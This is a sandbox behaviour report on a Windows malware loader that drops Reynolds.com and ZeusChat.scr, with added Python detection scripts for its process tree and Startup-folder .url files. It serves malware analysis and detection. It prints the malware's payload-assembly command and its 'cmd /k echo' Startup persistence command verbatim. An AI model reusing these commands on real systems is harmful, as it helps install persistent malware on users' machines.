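```python
"""Rebuild the process tree from Joe Sandbox 'Process created' records and
flag the loader pattern. Added example: records transcribed from the report,
rules are editor heuristics, not the sandbox's own signatures."""
import ntpath
from collections import defaultdict

# (parent image, child image, child command line). Transcribed from the
# report; the real copy /b command has 49 operands and is shortened here.
RECORDS = [
    (r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\cmd.exe",
     r"cmd /c md 29442"),
    (r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\cmd.exe",
     r"cmd /c copy /b ..\Wendy + ..\Psychiatry + ..\Rid + ..\Through + ..\Realized l"),
    (r"C:\Windows\SysWOW64\cmd.exe",
     r"C:\Users\user\AppData\Local\Temp\29442\Reynolds.com", r"Reynolds.com l"),
    (r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\choice.exe",
     r"choice /d y /t 5"),
    (r"C:\Users\user\AppData\Local\Temp\29442\Reynolds.com", r"C:\Windows\System32\cmd.exe",
     r'cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows'
     r'\Start Menu\Programs\Startup\ZeusChat.url" & echo URL="C:\Users\user\AppData\Local'
     r'\CyberSphere Dynamics\ZeusChat.js" >> "C:\Users\user\AppData\Roaming\Microsoft'
     r'\Windows\Start Menu\Programs\Startup\ZeusChat.url" & exit'),
    (r"C:\Users\user\AppData\Local\Temp\29442\Reynolds.com",
     r"C:\Users\user\AppData\Local\Temp\29442\Reynolds.com",
     r"C:\Users\user\AppData\Local\Temp\29442\Reynolds.com"),
    (r"C:\Windows\System32\wscript.exe",
     r"C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr",
     r'"C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr" '
     r'"C:\Users\user\AppData\Local\CyberSphere Dynamics\M"'),
    (r"C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr",
     r"C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr",
     r'"C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr"'),
    (r"C:\Users\user\AppData\Local\Temp\29442\Reynolds.com", r"C:\Windows\explorer.exe",
     r"explorer.exe"),
    (r"C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr", r"C:\Windows\explorer.exe",
     r"explorer.exe"),
]

# Editor-chosen heuristics (assumptions, not sandbox rules).
USER_WRITABLE = ("\\appdata\\local\\", "\\appdata\\roaming\\", "\\users\\public\\", "\\programdata\\")
DISGUISED_EXT = {".com", ".scr", ".pif"}          # PE files hiding behind odd extensions
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SCRIPT_EXT = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta"}
STARTUP_MARKER = "\\start menu\\programs\\startup\\"


def in_user_writable(path):
    low = path.lower()
    return any(marker in low for marker in USER_WRITABLE)


def findings_for(parent, image, cmdline):
    """Apply every rule to one parent -> child edge; return human-readable reasons."""
    out = []
    pname = ntpath.basename(parent).lower()
    iname = ntpath.basename(image).lower()
    ext = ntpath.splitext(iname)[1]
    low = cmdline.lower()
    if "copy /b" in low:                          # payload assembled from chunk files
        parts = low.count(" + ") + 1
        if parts >= 4:
            out.append(f"stages payload by concatenating {parts} chunks with copy /b")
    if ext in DISGUISED_EXT and in_user_writable(image):
        out.append(f"runs {iname} from a user-writable path with a disguised extension")
    if pname in SCRIPT_HOSTS and ext not in SCRIPT_EXT:
        out.append(f"script host {pname} launched a dropped PE ({iname})")
    if iname == "explorer.exe" and in_user_writable(parent):
        out.append(f"explorer.exe spawned by {ntpath.basename(parent)} (process hollowing/injection target)")
    if "[internetshortcut]" in low and STARTUP_MARKER in low:
        out.append("writes an InternetShortcut into the Startup folder (persistence)")
    return out


def build_tree(records):
    """parent image -> list of child images, in report order."""
    tree = defaultdict(list)
    for parent, image, _ in records:
        tree[parent].append(image)
    return dict(tree)


def analyze(records):
    """Return (parent name, child name, reason) for every rule hit."""
    hits = []
    for parent, image, cmdline in records:
        for reason in findings_for(parent, image, cmdline):
            hits.append((ntpath.basename(parent), ntpath.basename(image), reason))
    return hits


if __name__ == "__main__":
    for parent, children in build_tree(RECORDS).items():
        print(parent)
        for child in children:
            print("   ->", child)
    for parent, child, reason in analyze(RECORDS):
        print(f"[!] {parent} -> {child}: {reason}")
```

Each rule is weak on its own (copy /b and choice /d y /t 5 are ordinary batch idioms, and explorer.exe is normally started by userinit.exe or by explorer itself), so the value is in the combination along one tree: concatenation, a .com from %TEMP%, a Startup write, a script host launching a .scr and two explorer.exe children from user-writable parents. The same tuples can be fed from Sysmon event ID 1 (ParentImage, Image, CommandLine) without changing the rules.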
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\choice.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Section loaded: rasadhlp.dll
Source: C:\Windows\explorer.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe | Section loaded: userenv.dll
Source: C:\Windows\explorer.exe | Section loaded: wininet.dll
Source: C:\Windows\explorer.exe | Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe | Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe | Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe | Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe | Section loaded: napinsp.dll
Source: C:\Windows\explorer.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\explorer.exe | Section loaded: wshbth.dll
Source: C:\Windows\explorer.exe | Section loaded: nlaapi.dll
Source: C:\Windows\explorer.exe | Section loaded: winrnr.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: explorerframe.dll
Source: C:\Windows\explorer.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\explorer.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\explorer.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe | Section loaded: userenv.dll
Source: C:\Windows\explorer.exe | Section loaded: wininet.dll
Source: C:\Windows\explorer.exe | Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: file.exe | Static file information: File size 4389991 > 1048576
Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: autorunsc64a.pdb | source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: autorunsc64a.pdb= | source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Autoruns.pdb | source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Autoruns64a.pdb | source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Autoruns64.pdb | source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: autorunsc.pdb | source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: utorunsc.pdb | source: explorer.exe, 00000012.00000002.3264572586.000000000162E000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: explorer.exe, 00000012.00000003.2516037085.00000000054AC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3265796424.00000000054CB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2312256260.0000000001350000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2354445600.00000000054AC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2703350861.00000000054CC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2672721393.00000000054CC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2550085788.00000000054CD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: utorunsc64.pdb | source: explorer.exe, 00000012.00000002.3264572586.000000000162E000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: autorunsc64.pdb | source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: utoruns64a.pdb | source: explorer.exe, 00000012.00000002.3264572586.000000000162E000.00000004.00000010.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
Source: file.exe | Static PE information: real checksum: 0x43515c should be: 0x42fd74
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Code function: 17_2_000002453CA21394 push qword ptr [000002453CA34004h]; ret 17_2_000002453CA21403
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Code function: 17_2_000002453CA23A16 push rdx; iretd 17_2_000002453CA23A17
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Code function: 17_2_000002453CA23788 push rdx; iretd 17_2_000002453CA23789
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Code function: 17_2_00007FF7AA127149 push rdi; ret 17_2_00007FF7AA127152
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Code function: 17_2_00007FF7AA1276AD push rdi; ret 17_2_00007FF7AA1276B4
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Code function: 20_2_00007FF752037149 push rdi; ret 20_2_00007FF752037152
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Code function: 20_2_00007FF7520376AD push rdi; ret 20_2_00007FF7520376B4
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Code function: 21_2_0000014D5CA91394 push qword ptr [0000014D5CAA4004h]; ret 21_2_0000014D5CA91403
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Code function: 21_2_0000014D5CA93A16 push rdx; iretd 21_2_0000014D5CA93A17
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Code function: 21_2_0000014D5CA93788 push rdx; iretd 21_2_0000014D5CA93789

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | File created: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | File created: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Tech
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Tech
Source: C:\Windows\System32\cmd.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url
Source: C:\Windows\System32\cmd.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url
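The ZeusChat.url written here is the persistence mechanism: the cmd /k echo command in the process list above produces an [InternetShortcut] whose URL= value is a local .js path rather than a web address, so at the next logon the shell hands ZeusChat.js to wscript.exe, which in turn starts ZeusChat.scr. Two details of how echo writes the file matter for anyone parsing it: a space is kept before each redirection operator, so both lines end in a trailing blank, and the path stays wrapped in the quotes the command used. The Python below is an added example, not part of the report: it parses a .url body with exactly that layout (constructed here from the echo command), classifies the target, and can be pointed at the current user's Startup folder. The extension lists and verdict names are the editor's own.

```python
"""Classify .url shortcuts in the Startup folder: a URL= that points at a
local script or executable is a persistence entry, not a bookmark.
Added example, not from the report."""
import glob
import ntpath
import os
import re
from urllib.parse import unquote, urlparse

# Constructed: the bytes the report's cmd /k echo command produces (echo keeps
# the space before '>' / '>>' and writes CRLF line endings).
SAMPLE_URL_FILE = (
    "[InternetShortcut] \r\n"
    'URL="C:\\Users\\user\\AppData\\Local\\CyberSphere Dynamics\\ZeusChat.js" \r\n'
)

# Editor-chosen extension lists (assumptions).
SCRIPT_EXT = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".ps1", ".bat", ".cmd"}
EXEC_EXT = {".exe", ".com", ".scr", ".pif", ".dll"}


def parse_url_file(text):
    """Minimal INI parser tolerant of the trailing spaces and quotes echo leaves."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip().strip('"')
    return sections


def local_target(url):
    """Return a Windows path if the URL= value points at a local file, else None."""
    u = url.strip()
    if re.match(r"^[a-zA-Z]:\\", u) or u.startswith("\\\\"):   # C:\... or UNC
        return u
    parsed = urlparse(u)
    if parsed.scheme == "file":                               # file:///C:/...
        return unquote(parsed.path).lstrip("/").replace("/", "\\")
    return None


def assess_url_shortcut(text):
    """Return {'verdict': ..., 'target': ...} for one .url body."""
    sections = parse_url_file(text)
    target = sections.get("internetshortcut", {}).get("url")
    if target is None:
        return {"verdict": "malformed", "target": None}
    path = local_target(target)
    if path is None:
        return {"verdict": "web-link", "target": target}
    ext = ntpath.splitext(path)[1].lower()
    if ext in SCRIPT_EXT:
        return {"verdict": "local-script", "target": path}
    if ext in EXEC_EXT:
        return {"verdict": "local-executable", "target": path}
    return {"verdict": "local-file", "target": path}


def scan_startup_folder():
    """Assess every .url in the current user's Startup folder (Windows only)."""
    appdata = os.environ.get("APPDATA")
    if not appdata:
        return []
    startup = os.path.join(appdata, "Microsoft", "Windows", "Start Menu", "Programs", "Startup")
    results = []
    for name in glob.glob(os.path.join(startup, "*.url")):
        with open(name, encoding="utf-8", errors="replace") as fh:
            results.append((name, assess_url_shortcut(fh.read())))
    return results


if __name__ == "__main__":
    print("sample:", assess_url_shortcut(SAMPLE_URL_FILE))
    for name, verdict in scan_startup_folder():
        print(name, verdict)
```

A .url whose target is a web address is what the file type is for; any local script or PE target in Startup deserves a look, and the report's combination (a .js target under %LOCALAPPDATA% written by cmd.exe spawned from a .com in %TEMP%) should be treated as malicious persistence. On a live host the matching Sysmon signal is a FileCreate (event ID 11) for *.url under \Start Menu\Programs\Startup\ with cmd.exe as the writing image.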
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Code function: 17_2_00007FF7AA114364 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,17_2_00007FF7AA114364
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Code function: 20_2_00007FF752024364 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,20_2_00007FF752024364
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 4326
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 510
Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com | API coverage: 0.2 %
Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr | API coverage: 1.6 %
Source: C:\Windows\explorer.exe TID: 6208 | Thread sleep count: 4326 > 30
Source: C:\Windows\explorer.exe TID: 6208 | Thread sleep time: -86520s >= -30000s
Source: C:\Windows\explorer.exe TID: 6208 | Thread sleep count: 510 > 30
Source: C:\Windows\explorer.exe TID: 6208 | Thread sleep count: 32 > 30
